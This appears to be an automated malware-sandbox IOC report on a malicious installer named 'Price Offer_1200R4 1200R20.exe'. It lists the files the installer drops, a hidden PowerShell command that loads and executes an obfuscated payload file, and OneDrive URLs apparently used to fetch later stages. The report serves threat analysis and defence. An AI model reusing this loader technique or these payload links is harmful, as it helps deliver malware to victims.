IOC Report
Price Offer_1200R4 1200R20.exe

loading gif

Files

File Path
Type
Category
Malicious
Price Offer_1200R4 1200R20.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
initial sample
malicious
C:\Users\user\AppData\Local\Temp\Gastrostomize.exe
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
dropped
malicious
C:\Users\user\AppData\Local\Temp\Gastrostomize.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33
ASCII text, with very long lines (65536), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\AdvSplash.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\nsDialogs.dll
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Gastrostomize.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hg1llhqc.aon.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_psbwawut.eua.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Aarhusianeren.Sna
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\afviserblinkenes.cin
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\hambro.kio
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\hjlperen.adm
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\litografiens.eup
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\nontenurial.tra
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\stlndingen.dis
data
dropped
C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Flintekser\temperaturmaaling.txt
ASCII text, with CRLF line terminators
dropped
There are 8 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe
"C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)"
malicious
C:\Users\user\AppData\Local\Temp\Gastrostomize.exe
"C:\Users\user\AppData\Local\Temp\Gastrostomize.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/sct
unknown
https://duckduckgo.com/chrome_newtab
unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
unknown
https://duckduckgo.com/ac/?q=
unknown
http://tempuri.org/Entity/Id23ResponseD
unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
unknown
http://tempuri.org/Entity/Id12Response
unknown
http://tempuri.org/
unknown
http://tempuri.org/Entity/Id2Response
unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
unknown
http://tempuri.org/Entity/Id21Response
unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
unknown
http://tempuri.org/Entity/Id9
unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
unknown
http://tempuri.org/Entity/Id8
unknown
https://gcwema.bn.files.1drv.com/y
unknown
http://tempuri.org/Entity/Id5
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
unknown
http://tempuri.org/Entity/Id4
unknown
https://gcwema.bn.files.1drv.com/y4mqvM36ByLD9K0VAWLVL6a1k1_p1wIfrODC391i7sxjSbFXZaU8m53aP1PNPBAw-Z2
unknown
https://onedrive.live.com/
unknown
http://tempuri.org/Entity/Id7
unknown
http://tempuri.org/Entity/Id6
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
unknown
http://tempuri.org/Entity/Id19Response
unknown
https://gcwema.bn.files.1drv.com/d
unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
unknown
https://gcwema.bn.files.1drv.com/y4mye_Jf7K0w86rbJFL3Cz44mUGm8bynBGyx6Ciamik_PJLoT5oqohZzX2QmYT8NSIF
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat
unknown
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
unknown
http://tempuri.org/Entity/Id15Response
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
unknown
http://tempuri.org/Entity/Id6Response
unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
unknown
https://api.ip.sb/ip
unknown
https://onedrive.live.com/download?resid=F547EE3E8FFF6BF5%21682&authkey=
unknown
http://schemas.xmlsoap.org/ws/2004/04/sc
unknown
http://tempuri.org/Entity/Id1ResponseD
unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
unknown